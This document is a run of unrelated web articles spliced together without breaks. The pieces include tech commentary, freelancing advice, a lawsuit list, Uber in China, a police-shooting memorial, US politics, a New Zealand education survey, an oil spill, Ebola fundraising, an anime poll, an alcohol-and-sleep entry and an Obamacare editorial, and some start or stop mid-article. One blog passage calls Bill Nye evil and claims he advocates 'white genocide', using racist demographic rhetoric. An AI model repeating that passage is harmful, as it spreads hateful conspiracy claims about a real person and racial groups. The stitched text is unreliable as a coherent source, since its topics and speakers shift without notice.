He says the notification bar is “always oozing like an open sore” that leaves a “pile of tiny incomprehensible turds appear at the top of my screen, uglifying it to no end.” Regarding HTC's implementation of on-screen navigation bar buttons, he says that he's “never seen a piece of UI that so contributes to clutter that it needs an extra step to unhide itself that provides ZERO additional functionality.” Android's universal back button is “downright confusing” and “unpredictable and annoying.” The device's home screen contains “small icons and too much white space,” while “typing just sucks.”
So, did Cooperman find anything at all to like about Android? Basically, no.
“My day-to-day Android experience is almost never pleasant,” he moans toward the end of his piece. “It's death by a thousand cuts. These little awkward moments in the UX add up, and in the end I don't love my Android phone. I don't love using it. I prefer not to browse with it. I'm not excited to install new apps.”
In other words, you really shouldn't ask Cooperman for advice on which Android phone you should buy because it sounds like he'll just tell you to get an iPhone.
For more on what it's like to make the switch, check out: Here's what happens when a longtime iPhone user switches to Android
4. Time Your Projects and Invoices So You Can Demand On-Time Payments
This is a topic I don't hear about very often from the freelancing community.
It's important for you to time your projects and client invoicing to be completed and paid within the same month.
This can be tricky because getting projects lined up for the next month means being in constant contact with new clientele.
The point here is to schedule, complete, and invoice projects within the month so you can get paid sooner rather than later (and preferably within that month).
You also need to demand on-time payment within a shorter amount of time.
Be professional about it and let the client know this before work is started so put it in your contract that payment must be made by the due date or hefty fees will be added on to each day payment is late.
You're running a business, and you must be paid on time, so a good rule of thumb is to reduce your “invoice due” time from 30 days to 10 or 15 days.
Good clients will have a budget already set up when they hire you and should have no problem paying you immediately upon invoice. But some clients may need more time, reducing your time for payment within 15 days can get you paid within the same month.
I let my clients know before work starts that payment is due within 15 days of invoice and a fee penalty is incurred for each day payment is late. I haven't had any problems yet.
Remember, as a freelancer you set the rules for your projects and payments. Just make sure your terms are clearly stated in a freelancing contract.
We've all heard about crazy lawsuits and 2011 was no exception when it came to the filing of frivolous – even ridiculous – lawsuits.
A lawsuit by a kidnapper against his victims for not helping him evade police tops the U.S. Chamber of Commerce's Institute for Legal Reform's (ILR) survey of the Top Ten Most Ridiculous Lawsuits of 2011, released today.
"While these lawsuits vary from the outrageous to the humorous, abusive litigation is hardly a laughing matter," said ILR President Lisa Rickard. "ILR's annual poll of ridiculous lawsuits helps to remind us that abusive lawsuits affect real people and real businesses, and can have harmful results to lives, jobs, and even our economic growth."
ILR announced the top ten vote-getters from among those chosen throughout the year by visitors to the FacesOfLawsuitAbuse.org website. The lawsuits were selected from those featured in the website's monthly polls for 2011. The Faces of Lawsuit Abuse campaign is ILR's public awareness effort created to highlight the impact of abusive lawsuits on small businesses, communities, and individuals.
The top ten Most Ridiculous Lawsuits of 2011 are:
•Convict sues couple he kidnapped for not helping him evade police
•Man illegally brings gun into bar, gets injured in a fight, then sues bar for not searching him for a weapon
•Young adults sue mother for sending cards without gifts and playing favorites
•Woman disagrees with store over 80-cent refund, sues for $5 million
•Mom files suit against exclusive preschool over child's college prospects
•Man suing for age discrimination says judge in his case is too old
•Obese man sues burger joint over tight squeeze in booths
•Woman sues over movie trailer; says not enough driving in "Drive"
•Passenger's lawsuit says cruise ship went too fast and swayed from side to side
•Mother sues Chuck E. Cheese – says games encourage gambling in children
Links to the full news stories from which these were drawn and the complete results of the poll can be found on the Faces of Lawsuit Abuse web site.
This story was provided by BusinessNewsDaily, a sister site to LiveScience.
Uber Is Facing Big Challenges In China
Uber faces some tough competition in China and various kinds of partnerships between their rivals are preventing it to expand further. China's dominant ride-hailing app Didi Kuaidi has some powerful friends. One of them is Tancent, owner of the country's most popular messaging app, WeChat. The service has more than 600 million active users, most of them Chinese residents, using the app to communicate with friends. A popular feature on it is to receive updates and coupons from many if their favorite domestic and foreign brands.
However, Uber cannot be found on WeChat anymore. Suddenly its accounts began to disappear from the service on March 16th. In the following months Tencent began to ban or freeze all of Uber's accounts on WeChat. Uber is spending huge amounts of money in China, telling its investors it is planning to spend $1 billion this present year. Even though this accounts for roughly half of the top 10 busiest cities by number of trips booked through the app, Didi Kuaidi is way ahead. The company apparently accounts for 78% of the country's private car business.
According to reports in the local media, Tancent was first blaming Uber's issues on WeChat policy violations and later on technical glitches. Both Tancent and Didi Kuaidi declined to comment. Analyst Gene Cao explained that those companies are very sensitive on this and that “Tancent, particularly their WeChat business unit, is very conservative about publicly commenting on any WeChat strategy.”
The loss of WeChat is a massive hit to Uber in China, as the service has become an important promotional tool for companies trying to reach wealthy Chinese. WeChat's Chinese version had 8 million public accounts in late 2014, and before March, WeChat had become a very important part of how Uber communicated with passengers and drivers.
Help from the Chinese government shouldn't be expected as Beijing tends to side with local companies over foreign ones, and as a result the Silicon Valley's app has suffered. But Uber is actually optimistic that Tancent will eventually back down: “I think as we continue to succeed, and it's clear we're in this for the long haul—we've got Chinese investors behind us; we've got partnerships with cities; we're spending money in the local economy; local investors have an interest in our success—then we'll get into more of a détente mode,” said Emil Michael, senior vice president for business at Uber.
warren robinson 16 years old, Auburn Gresham
Warren Robinson lived with his grandmother in the Auburn Gresham neighborhood on the south side of Chicago. He would take her to church on Sundays. Warren was a graduate of Mahalia Jackson Elementary and attended Julian High School and Banner West Academy. The only people he followed on Twitter were Lil Wayne & Barack Obama. A rapper and singer, Warren was part of the young, emerging hip-hop crew BOB/FOE, Family Over Everything. "Warren took it to heart more than everybody," said DaQuan Davis, FOE member and a friend since the fifth grade. "We were more like brothers. We were all he had. He kept us together."
On July 5th, 2014, Warren was near his grandmother's home when police were called to the neighborhood after reports of gunshots. There are conflicting reports as to what happened next. What is clear: police identified Warren as matching the caller's description, and chased him through an alley. Neighbor Keiyana Hawkins told the Chicago Tribune she went outside and saw a young man running and surrendering with his raised hands when police officers opened fire. The police shot Warren twenty times, according to his mother, Georgina Utendahl. "The police killed him," she told news media. "Why they killed him, I don't know. We want answers."
Tatechia Martin, DaQuan Davis's mother, would let Warren stay in her house for days at a time. "Warren wanted love, " said Ms. Martin, who moved her family to Texas soon after Robinson's murder, to protect her sons from police and violence in Chicago.
“I believe that when the police see a young Black man, they are trained to shoot to kill. They think we are a danger to society,” said DaQuan Davis.
Warren Robinson was sixteen years old when he was murdered by police, three days shy of his seventeenth birthday.
-Kevin Coval
A Democratic super-PAC is needling Sen. Marco Rubio Marco Antonio RubioHillicon Valley: Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Trump unleashing digital juggernaut ahead of 2020 MORE (Fla.) by questioning his justification for missing last week's vote on the omnibus funding bill.
The Republican presidential candidate told CBS News on Friday that “in essence, not voting for it is a vote against it,” because the Senate needed 60 votes to clear a filibuster on the bill.
But Jessica Mackler, president of American Bridge 21st Century, pushed back at that rationale in a statement shared exclusively with The Hill.
“Marco Rubio wants us to take him at his word that not showing up is voting no,” she said.
ADVERTISEMENT
“Ok, then GOP primary voters are surely going to want to know why he 'voted no' on approving Keystone, requiring Iran to recognize Israel, preventing the president from lifting Iran sanctions, and defense reauthorization? Good luck explaining that to conservatives, Senator."
Rubio is on record supporting the Keystone XL oil pipeline and for Iran to recognize Israel, and he has opposed lifting sanctions on Iran.
But the senator's opponents have repeatedly criticized him during his presidential bid for missing votes, and three of the four votes that Mackler mentions took place during his bid. Those attacks have become more frequent as Rubio's poll numbers rise and he is increasingly seen as a top contender for the nomination.
An American Bridge aide also told The Hill that the critique will be a part of its messaging against Rubio moving forward.
While Rubio voted against the Iran nuclear deal at various points, he missed the final attempts at blocking it in September. Those votes, on amendments and a bill to block it, occurred one day after a presidential debate in California. Sen. Rand Paul Randal (Rand) Howard PaulThe Hill's Morning Report — Emergency declaration to test GOP loyalty to Trump The Hill's 12:30 Report: Trump escalates fight with NY Times The 10 GOP senators who may break with Trump on emergency MORE (Ky.), a fellow candidate, also missed the vote, though Sens. Ted Cruz Rafael (Ted) Edward CruzTrump unleashing digital juggernaut ahead of 2020 Inviting Kim Jong-un to Washington Trump endorses Cornyn for reelection as O'Rourke mulls challenge MORE (Texas) and Lindsey Graham Lindsey Olin GrahamHouse to push back at Trump on border Trump pressures GOP senators ahead of emergency declaration vote: 'Be strong and smart' This week: Congress, Trump set for showdown on emergency declaration MORE (S.C.) made it back in time.
The Defense reauthorization vote happened in November, and the Keystone vote occurred in January, well before Rubio began his presidential bid.
American Bridge is not the only Democratic group stepping up attacks on Rubio. In the fall, The Hill reported that Priorities USA, a super-PAC aligned with Democratic front-runner Hillary Clinton Hillary Diane Rodham ClintonSanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' Former Sanders campaign spokesman: Clinton staff are 'biggest a--holes in American politics' MORE, issued a dozen separate emails or advertisements that directly attacked Rubio over a span of two weeks. The group targeted him more than any other GOP candidate during that time.
Rubio is in third place in RealClearPolitics' average of national polls, and he places third in the early-voting states of Iowa, New Hampshire and South Carolina.
Lecturers and tutors are under increasing pressure to pass students who should be failed, the Tertiary Education Union says.
Photo: 123RF
The union's president, Sandra Grey, told Nine to Noon government policies demanding higher pass rates had prompted institutions to ask staff to be overly lenient on poorly-performing students.
She said the union heard repeated stories about the problem from its members.
"We've had staff who've been told to basically stand over students during a test and make sure that they can answer the question or being told to give another examination, let them re-sit and re-sit and re-sit until they pass," she said.
Dr Grey said institutions were finding more cheating among students, but staff were often asked to ignore it.
"We are seeing perhaps institutions saying 'look, we've got a lot of these cases, can we just ignore the least worrisome, the ones that aren't too bad, can we just put them to one side?'"
The union said the problem was highlighted by a survey in which 63 percent of 1006 respondents said they were under more pressure to pass students to meet government targets than they were 10 years ago.
Most staff members felt pressure to enrol students even if they lacked the prerequisite skills and knowledge.
One respondent wrote: "We have been pressured to change assessments, ignore cheating, pass students who are between 45 and 48 percent. Management re-enrol students who previously have not attended their classes and failed every paper they enrolled in - not just once but for several years."
Another said: "The emphasis on successful completion rates is hurting education standards. Lecturers [are] under intense pressure to pass students by managers; leading to acts of shameful manipulations, low quality assessments and exams."
Ms Grey said the problems were caused by government under-funding combined with policies that focused on competition and profit.
"They're being told either that it's none of their business who gets admitted to their courses, so that will be done by a company outside their department or an administrator... or they're being told to take everyone who wants to come into those courses," Dr Grey said.
"We believe everyone should have access to education, but they need it at the right level."
Dr Grey said staff were bullied or faced disciplinary action if they spoke out. She said they were told their courses might be axed if too few students were enrolled or if too few continued from one year to the next.
Well-being getting worse
The Tertiary Education Union survey also revealed a crisis in staff well-being, with most saying their jobs had got worse in the past 10 years, it says.
Almost 60 percent said they were working more hours.
Dr Grey said the union's members were among the most stressed workers in New Zealand.
"There's a very easy stress indicator which gives you a one-to-10 scale, and our members are saying that their stress levels are at a seven out of 10. The average for the population is 5.5."
"The big picture we've found is staff under absolute strain because they just don't have the resources to do the job well."
The union's vice-president, Phil Edwards, said staff were spending too much time on systems and processes and not enough simply looking after students.
"What academics once did, which was concentrated around teaching and learning, has become more around counting things and then having to justify pass rates and other key performance indicators," he said.
One of the union's polytechnic members, Carol Soal, said work had become more hectic and more focused on business models than on students.
Tutors were working with more students and that was having a knock-on effect on support staff.
A union member from a university, Sheeanda McKeagg, said institutions had fewer staff dedicated to helping Māori students because those roles were subsumed into general support roles.
"The students are left floundering to find out where to get the right paper advice, get the right support for accommodation or whatever it is," she said.
Tertiary Education Minister Paul Goldsmith said New Zealand spent a higher proportion of its total public expenditure on tertiary education than any other OECD country.
He said government funding for tertiary education institutions had increased 16.7 percent since 2008, and totalled about $2.3 billion in 2015.
The nine-mile Santa Barbara coastline hit by an oil spill on Tuesday is even worse off than expected.
Officials now say about 105,000 gallons of crude oil have spilled into Refugio State Beach, up from five times the original predictions. It may take months before the beach is restored, U.S. Coast Guard Capt. Jennifer Williams said at a news conference.
view photo essay Crews race to contain massive California oil spill The estimated size of the spill, about 20 miles up the coast from Santa Barbara, ballooned to 105,000 gallons.
The pipe was carrying about 2,000 barrels of oil an hour, according to Plains All American, the company who owns the pipeline.
The company says it “deeply regrets” the spill. The oil transportation company has been fined at least 10 times for oil spill violations in four other states between 2004 and 2007, according to reports. The Houston-based company has been deemed the “worst violators” by the U.S. Pipeline and Hazardous Materials Administration.
Investigators are uncertain as to what caused the devastating spill, but rescuers are working around the clock to get a handle on the environmental disaster. So far, carcasses of petroleum-soaked pelicans have been found, along with live oil-covered pelicans, sea lions, and elephant seals.
The massive oil spill comes as California is battling another major environmental problem: A historic draught has devastated farms in the state and led to unprecedented restrictions on water usage.
The state suffered another blow on Thursday after vandals deflated a rubber dam in the East Bay area of San Francisco. As a result, nearly 50 million gallons of drinking water was wasted as it flowed into the San Francisco Bay, according to NBC Bay Area. The water was enough to supply a year's worth of water for 500 homes.
Authorities are not sure as to the motive for deflating the dam, but it raises bigger questions about California's current water supply threat and the security of the nation's infrastructure. Authorities have increased security at other dams in the area, NBC reported.
This year's Ebola outbreak has sparked a global response. Governments, aid organizations, and public health groups from across the world are pledging billions of dollars and sending personnel to provide relief in affected areas.
The situation is urgent. The World Health Organization projects that anywhere from 5,000 to 10,000 new cases will occur weekly by December. The current outbreak has already claimed more lives than all previous ebola outbreaks put together.
At this rate, the already high cost of containment will only continue to grow. The ebola treatment camp in Bong County, Liberia (built by Save the Children, operated by the International Medical Corps) cost $175,000 to build. It employs a paid staff of 165 and goes through 100 sets of gowns, sheets, and other basic patient supplies a day. Monthly, the operating cost is around $1 million, or $15,000 per bed. According to figures from the WHO, operating 100,000 beds would cost West Africa $1 to $2 billion a month.
Frontline non-profits are struggling with these costs. Natural disaster development professionals are at pains to formulate effective fundraising strategies. While a couple of high-profile donations have secured media attention for the fundraising effort—Facebook CEO Mark Zuckerberg donated $250 million the the Centers for Disease Conrol, and the Bill and Melinda Gates foundation pledged $50 million to UN agencies and various non-profits operating in West Africa—fundraisers face an uphill battle appealing to grass-roots funding.
According to Joel Charny of InterAction, this is because donors respond to cataclysmic events. Highly visible natural disasters such as the 2010 earthquake in Haiti and the 2013 typhoon in the Philippines generate not only billions in fundraising, but also volunteers. According to David Wightwick of Save the Children, planes were overflowing with volunteers after Typhhon Haiyan struck the Philippines. But when his organization requested 28 logisticians to work in countries affected by ebola, 21 declined.
Gary Shaye, who also works for Save the Children, commented that “until [ebola] is something much more visible in the media, it's almost impossible to raise funds.”
Finding a way to tap into the public's philanthropic spirit is a paramount issue facing frontline non-profits working to contain ebola. Once fundraisers craft a message that connects their potential donors to the plight of ebola sufferers—just as donors felt connected to the victims of other recent natural disasters—disaster relief organizations will be able to move forward in their hugely important work.
This process may now be under way. Mark Zuckerberg has announced a fundraising drive that will be featured on Facebook, where users will be asked to help stop ebola with a donation to the response effort.
Apple's iPhone event is what everyone is looking forward to today, but Qualcomm is set to rain on the Cupertino's company parade. It released a list of Android firsts trying to imply that Apple is playing catch up rather than leading the market lately.
Qualcomm boasts about laying the foundation for so many technologies and experiences we value in our smartphones today. It mentions the Gigabit LTE, available in all Snapdragon 835 devices. Although the chipset company listed sample devices (not to be confused with pioneers or firsts), we are pretty sure the Galaxy S8 still does not have a dual camera on its back.
The company lists plenty of manufacturers that it has worked closely. Names like Google, Samsung, LG, HTC, and Motorola are included, even vivo and Oppo are mentioned as two of the top five smartphone companies in the world.
The press release ends with stating that partners bringing next wave of class-leading Android devices will continue to pave the way for others to come. The whole message clearly is aimed at Apple.
Source: EE Times
This announcement is a heavy stone being thrown in the never-ending war of Android vs. iOS. Stay tuned for the latest episode later tonight!
Source
Moratti rules out Inter return
By Football Italia staff
Massimo Moratti has ruled out ever returning as President at Inter, but suggests his son may one day take on the role.
Moratti served in the role for 18 years before Erick Thohir's takeover last November and does not see why he would return to the position again.
“To return now as President would be crazy, but perhaps one day my son might do it, I do not rule that out,” the 68-year-old commented today on Telelombardia.
Moratti is honorary President and remains a minority shareholder in the Nerazzurri whilst his son Angelomario is listed as Vice-President.
“Taking on Inter to me was like running away with a blonde. Now I am glad to be in the club as a partner. It's a matter of the heart and I have to thank Thohir.”
Moratti was asked about Milan's difficulties this season also.
“I will not go into the merits of the crisis of Milan, as I am not aware of them.
“It may be that they have internal problems at the club. Certainly, they are trying to solve it.
“And Milan up for sale too? It may be that they have the desire to sell, knowing also that in the future there is always the possibility of a return…”
Generally fans and critics prefer the original to the adaptation. The book is better than the movie. The manga is between than the anime. The anime is better than the movie. However, sometimes, at least arguably, that isn't the case. Japanese ranking site Goo has done one of their polls (they do a "Research Plus" survey of 500 readers - 250 male and 250 female between ages 20 and 30), asking fans to name a series where the anime adaptation improved on the original manga.
When they dug into the top picks, there was some interesting thinking behind the selections, as it evolved into something of a referendum of what works in comedy. Some suggested that jokes work better in animation, where there is more of a directed experience in the timing of the gags than in manga, arguing the adapted medium is better able to structure a punchline and play up a reaction.
Other responses built up a case that comedies were better when they were naughty, but not crude. They wanted to see shows offend institutions like the PTA and rights holders for the subject of parodies. However, they also suggest that comedies might be better if some of the nastiness is mediated. Some felt that Lupin III's gags and adventures were more appealing without the adult edges that Monkey Punch worked into the manga. Similarly, it might be surprising to learn that Crayon Shinchan ran in mature audience magazine Manga Action, and the suggestion here was that it was served by broadening the targets of its humor along with its audience in its adaptation into anime.
Obviously these are highly debatable points, but enough voters felt that way to place Shinchan, Gintama, and Lupin III at the top. The full list included...
49. Saki
46. (tie) Maria the Virgin Witch
46. School Rumble
46. Dusk Maiden of Amnesia
43. (tie) Seitokai Yakuindomo
43. Kannazuki no Miko
43. Ga-Rei
41. (tie) Engaged to the Unidentified
41. Future Diary
38. (tie) Food Wars!: Shokugeki no Soma
38. Akagi: The Genius Who Descended into Darkness
38. Excel Saga
36. (tie) Mushishi
36. Shōnen Ashibe GO! GO! Goma-chan
32. (tie) Lucky Star
32. Is the Order a Rabbit?
32. Kill Me Baby
32. Pani Poni
29. Gag Manga Biyori
29. Ouran High School Host Club
29. Miss Machiko
28. Ashita no Joe
27. Kodomo No Omocha
26. Ultimate Survivor Kaiji
25. Sexy Commando Gaiden: Sugoi yo!! Masaru-san
23. (tie) Basilisk: The Kōga Ninja Scrolls)
23. Squid Girl
20. (tie) Jojo's Bizarre Adventure
20. Chihayafuru
20. Rakudai Ninja Rantarō
18. (tie) Ordinary High School Girls Tried Being Locodols/Locodol
18. My Bride is a Mermaid
17 Akira
16. Akazukin Chacha
15. Oishinbo
14. Ojarumaru
13. Working!!
12. Kochikame
11. Hunter x Hunter
10. Dokonjō Gaeru
9. Mister Ajikko
8. Planetes
7. Attack on Titan
6. Chibi Maruko-chan
5. Sazae-san
4. K-on!
3. Crayon Shin-chan
2. Gintama
1. Lupin III
------
Scott Green is editor and reporter for anime and manga at geek entertainment site Ain't It Cool News. Follow him on Twitter at @aicnanime.
Facebook's $2 billion purchase is almost coming to fruition: the Oculus Rift virtual reality headset is coming in early 2016, and we've just used it. Good news: it's really, really good.
As seen above, we spent Tuesday morning putting the consumer version of the Oculus Rift through its paces at the E3 conference in Los Angeles. We tended goal as a hockey player; we explored 1930s Antarctica in "Edge of Nowhere;" we explored the futuristic environment known as "Oculus Home."
If you're still skeptical about virtual reality, or worried that what you've seen so far isn't up to the quality level you expected, the first consumer version of Oculus Rift should more than convince you. The "screen door effect" that's often spoken of in reference to VR headsets is nigh imperceptible in the consumer version of the Rift, and worries over "jutter" and blur are unfounded: the consumer version of the Rift is crisp, comfortable, and relentlessly immersive.
Seeing is believing, of course, and the best we can do in that respect is the video above.
An Uzbek gunman who killed 39 people in an Istanbul nightclub on New Year's Day told police he had to change target at the last minute to avoid heavy security and acted with direct orders from Islamic State in Syria, a newspaper said on Wednesday. The gunman, named by the authorities on Tuesday as Abdulgadir Masharipov, had initially been told to attack the area around the central Taksim square and said his instructions came from Raqqa, a Syrian stronghold of Islamic State, the Hurriyet newspaper cited him as saying in police testimony.
Advertising
Watch What Else is Making News
“I came to Taksim on New Year's Eve but the security measures were intense. It was not possible to carry out the attack,” he was quoted as saying.
“I was given instructions to search for a new target in the area. I toured the coast at around 10 p.m. with a cab,” he said, referring to Istanbul's Bosphorus shore where the Reina nightclub is located.
“Reina looked suitable for the attack. There didn't seem to be many security measures.”
Hurriyet did not say how it obtained the testimony and Reuters was not immediately able to verify the report.
Masharipov was caught in a police raid late on Monday in Esenyurt, a suburb on Istanbul's western outskirts, following a two-week manhunt. He was captured with an Iraqi man and three women from Africa, one of them from Egypt.
On Jan 1, he shot his way into the exclusive nightclub and opened fire on New Year's revellers with an automatic rifle, throwing stun grenades to allow himself to reload and shooting the wounded on the ground.
Islamic State claimed responsibility the next day, saying the attack was revenge for Turkish military involvement in Syria. Turkish troops entered Syria last August to push Islamic State away from the border and halt Kurdish militia advances.
Like many cities around the world on New Year's Eve, Istanbul had taken additional security measures, deploying 25,000 police officers to try to thwart attacks after a year of bombings by Islamic State and Kurdish militants.
Istanbul Governor Vasip Sahin said on Tuesday that Masharipov had admitted his guilt and that his fingerprints matched those at the scene.
Advertising
Sahin described him as well-educated, able to speak four languages, and said he had received training in Afghanistan.
No wonder some people find clowns so disturbing. Consider Bill Nye, who was never a scientist but used to be a comedian — i.e., a clown.
The Washington Post says everybody loves him:
Outside WaPo's liberal ruling class bubble, it would not be hard to find people who loathe Bill Nye. He is not merely creepy but genuinely malevolent. Here is video of him advocating white genocide and prison terms for anyone who won't play along with the global warming hoax:
Watch: @BillNye (The Vagina Guy) has had enough of your 'extra kids' wants a one-child policy in the US, & wants to jail climate skeptics. pic.twitter.com/n5AUWBNyyT — The Reagan Battalion (@ReaganBattalion) April 26, 2017
Radical environmentalists like Nye hate the human race in general, but as the video above demonstrates, they hate whites in particular. By restricting white reproduction as black reproduction explodes, they can create a world more to their liking — i.e., one that looks like Niger.
Like Bernie Sanders, Nye is not a flaky but well-meaning dork; he is a flaky and evil dork.
Like Al Franken, a former clown who is now scary instead of funny.
On tips from J, Torcer, Jester, and Byron. Hat tips: The Federalist, RedState.
Alcohol (also known formally as ethanol), found in alcoholic beverages, can exacerbate sleep disturbances. During abstinence, sleep disruption is one of the greatest predictors of relapse.[1]
Moderate alcohol consumption and sleep disruptions [ edit ]
Moderate alcohol consumption 30–60 minutes before bedtime results in disruptions in sleep maintenance and sleep architecture that are mediated by blood alcohol levels.[2] Disruptions in sleep maintenance are most marked once alcohol has been completely metabolized from the body. Under conditions of moderate alcohol consumption where blood alcohol levels average 0.06–0.08% and decrease 0.01–0.02% per hour, an alcohol clearance rate of 4–5 hours would coincide with disruptions in sleep maintenance in the second half of an 8-hour sleep episode.[2] In terms of sleep architecture, moderate doses of alcohol facilitate "rebounds" in rapid eye movement (REM) and stage 1 sleep; following suppression in REM and stage 1 sleep in the first half of an 8-hour sleep episode, REM and stage 1 sleep increase well beyond baseline in the second half. Moderate doses of alcohol also increase slow wave sleep (SWS) in the first half of an 8-hour sleep episode.[2] Enhancements in REM sleep and SWS following moderate alcohol consumption are mediated by reductions in glutamatergic activity by adenosine in the central nervous system.[2] In addition, tolerance to changes in sleep maintenance and sleep architecture develops within 3 days of alcohol consumption before bedtime.[2]
Alcohol consumption and sleep improvements [ edit ]
Low doses of alcohol (one 360.0 ml (13 imp fl oz; 12 US fl oz) beer) are sleep-promoting by increasing total sleep time and reducing awakenings during the night. The sleep-promoting benefits of alcohol dissipate at moderate and higher doses of alcohol (two 12 oz. beers and three 12 oz. beers, respectively).[3] Previous experience with alcohol also determines whether or not alcohol is a "sleep promoter" or "sleep disrupter." Under free-choice conditions, in which subjects chose between drinking alcohol or water, inexperienced drinkers were sedated while experienced drinkers were stimulated following alcohol consumption.[4] In insomniacs, moderate doses of alcohol improve sleep maintenance.[5]
Alcohol consumption and fatigue [ edit ]
Sleepiness influences the severity of alcohol consumption. Conditions of sleep deprivation encourage more episodes of alcohol consumption.[2] Increased alcohol consumption during the winter months for Northern climate residents is attributed to escalations in fatigue.[6]
Alcohol abstinence and sleep disruptions [ edit ]
Sleep and hormonal disruptions following withdrawal from chronic alcohol consumption are the greatest predictors of relapse.[1] During abstinence, recovering alcoholics have attenuated melatonin secretion in the beginning of a sleep episode, resulting in prolonged sleep latencies.[7] Escalations in cortisol and core body temperatures during the sleep period contribute to poor sleep maintenance.[7][8] Abstinent alcoholics tend to have lighter, more fragmented sleep than normal control subjects. Research indicates that it may take as long as one to two years for sleep to return to normal in abstinent alcoholics and that for some it may never return to normal.
See also [ edit ]
References [ edit ]
HIGHLAND FALLS, N.Y. — The Storm King Highway, a twisting two-lane ribbon carved into a mountainside here nine decades ago, hardly seemed the place to test the roadworthiness of a hot rod that looked to have just escaped the junkyard.
Of greater concern, perhaps, was that Peter Duvaloois had never traveled this road, some 50 miles north of Manhattan, before bringing his 1946 Chevrolet “rat rod” truck here to meet a reporter. On the Storm King Highway — a four-mile stretch of Route 218 that snakes along 400-foot cliffs overlooking the Hudson River and passes the United States Military Academy at West Point — drivers must resist staring into the breathtaking vistas, even while keeping their distance from the low stone wall that serves as a guardrail.
To Mr. Duvaloois, 62, rat rods like his home-built pickup represent a return to the roots of hot-rodding. Rat rod builders embrace vehicles that display a rebellious attitude, along with loud manners and an intentionally distressed appearance, not necessarily the qualities needed to deal with a demanding road better suited to sports cars or motorcycles.
But Mr. Duvaloois seemed pleased, and possibly relieved, that his hot rod had taken the curves so competently.
Storing memories this way would be very useful
I don't think I reveal a big secret if I say we love the Harry Potter series. So we made yet another piece of the universe - the memory vial.
Making the model, print it and assemble it. Neither of them was a big or problematic task. Finding a good glass for it on the other hand was not that easy. Most of the glasses we found were too big for this, but we found the perfect one.
The memory vial in the film had a transparent end, but we cannot print transparent. Yet. So we decided to make it looks like metal. We used gilding to achieve this fine metallic look. We are starting to be very good at gilding recently.
Making the memory glow in the dark was a bit more tricky. We ordered glow in the dark pigments online and mix it into some clear silicone sealant (can be bought in any hardware store). We formed a small amount of it to a thin layer and cut this sheet into strings after it dried.
It glows for an hour or so after it has been charged up with light, but not too brightly. It still looks awesome in the dark.
Come November, the grim trudge across the increasingly barren Obamacare landscape begins anew. Illinois consumers likely face staggering price hikes for individual insurance policies. Some types of plans could cost an average of 43 percent to 55 percent more. Ditto across the country: A first tranche of states approved 2017 rates with similarly cardiac-arrest-inducing premium increases.
Many Illinois consumers will find fewer choices because major carriers fled this market. UnitedHealthcare bolted. So did Aetna. Land of Lincoln Health collapsed mid-year, leaving policyholders to scramble for coverage that could cost them plenty. In many places across Illinois and the nation, people will find drastically fewer choices of plans than they did last year.
The Affordable Care Act has been criticized since it was passed in 2010. Its success depended on states supporting their marketplaces and enrolling healthy consumers. Sept. 7, 2016. The Affordable Care Act has been criticized since it was passed in 2010. Its success depended on states supporting their marketplaces and enrolling healthy consumers. Sept. 7, 2016. SEE MORE VIDEOS
Those insurers fled because they didn't want to lose more money on a government-run market that is so far out of whack — a market they think likely will never be profitable for them. That isn't surprising, as we enumerate below.
But by diagnosing Obamacare, all of us can see the mistakes that any repair or replacement can avoid. So let's look at the failings and how they can drive solutions:
Obamacare failed because it flunked Economics 101 and Human Nature 101. It straitjacketed insurers into providing overly expensive, soup-to-nuts policies. It wasn't flexible enough so that people could buy as much coverage as they wanted and could afford — not what the government dictated. Many healthy people primarily want catastrophic coverage. Obamacare couldn't lure them in, couldn't persuade them to buy on the chance they'd get sick.
Obamacare failed because the penalties for going uncovered are too low when stacked against its skyrocketing premium costs. Next year, the penalty for staying uninsured is $695 per adult, or perhaps 2.5 percent of a family's taxable household income. That's far less than many Americans would pay for coverage. Financial incentive: Skip Obamacare.
Scott Stantis
Obamacare failed because insurance is based on risk pools — that is, the lucky subsidize the unlucky. The unlucky who have big health problems (and big medical bills) reap much greater benefits than those who remain healthy and out of the doctors' office. But Obamacare's rules hamstring insurers. They can't exclude people for pre-existing conditions, and can't charge older customers more than three times as much as the young. Those are good goals, but they skew the market in ways Obamacare didn't figure out how to offset. Result: Young and healthy consumers pay far more in premiums than their claims (probably) would justify in order to subsidize the unexpectedly large influx of older, sicker customers who require expensive care. Too many unlucky people, too few lucky people: That will collapse any insurance scheme.
Obamacare failed because it allowed Americans to sign up after they got sick and needed help paying all those medical bills. Insurance should be structured so that, although you don't know if you'll need it, you pay for it anyway, just in case; your alternative is financial doom. But if you can game the system and, for example, buy auto coverage after you crash into your garage, then you have no incentive to buy insurance beforehand.
Obamacare failed because it hasn't tamed U.S. medical costs. Health care is about supply and demand: People who get coverage use it, especially if the law mandates free preventive care. Iron law of economics: Nothing is free; someone pays. To pretend otherwise was folly. Those forces combined to spike the costs of care, and thus insurance costs.
Obamacare failed because too many carriers simply can't cover expenses, let alone turn a profit, in this rigidly controlled system. Take Blue Cross and Blue Shield of Illinois, the state's dominant Obamacare insurer. Last year, for every dollar the carrier collected, it spent $1.32 buying care and providing services for customers, according to BCBS President Maurice Smith. No wonder BCBS is proposing rate increases from 23 percent to 45 percent for its individual plans.
A question looms: Is Obamacare plunging in a so-called insurance death spiral? Is the market so unstable that plans are doomed to get more and more expensive, driving more Americans and more insurers out of the market until ... Obamacare thuds to the pavement?
We won't predict that, but neither do we see a mathematical alternative. What's clear is that the solutions to Obamacare are implicit in its failures. A repaired or replaced system has to be more flexible, letting insurers offer a wider range of plans so that consumers, not lawmakers or bureaucrats, dictate what's best for them. That system should protect those who carry continuous coverage, not coddle those who duck in and out of plans when their health needs change.
A new system also should scrap the job-killing Obamacare mandates that discourage companies from hiring and discourage workers from adding hours. Instead of gearing subsidies to incomes, let Americans not covered via an employer reap tax credits to help finance their insurance purchases on the open market. And tell us again: Why can't insurers sell policies across state lines? Imagine the pricing competition that would unleash.
We can deny the current system's failings, or we can parlay our evolving knowledge into something much better.
Put another way: The next president and Congress either reckon with Obamacare's failures or ... wait for the thud.
Join the discussion on Twitter @Trib_Ed_Board and on Facebook.
Related articles:
Why health care in America can't be fixed
Trump, GOP leaders abruptly pull health care bill in stunning defeat
Electronic Arts CFO Blake Jorgensen confirms BioWare's Montreal team has been integrated into Jade Raymond's new EA Motive studio.
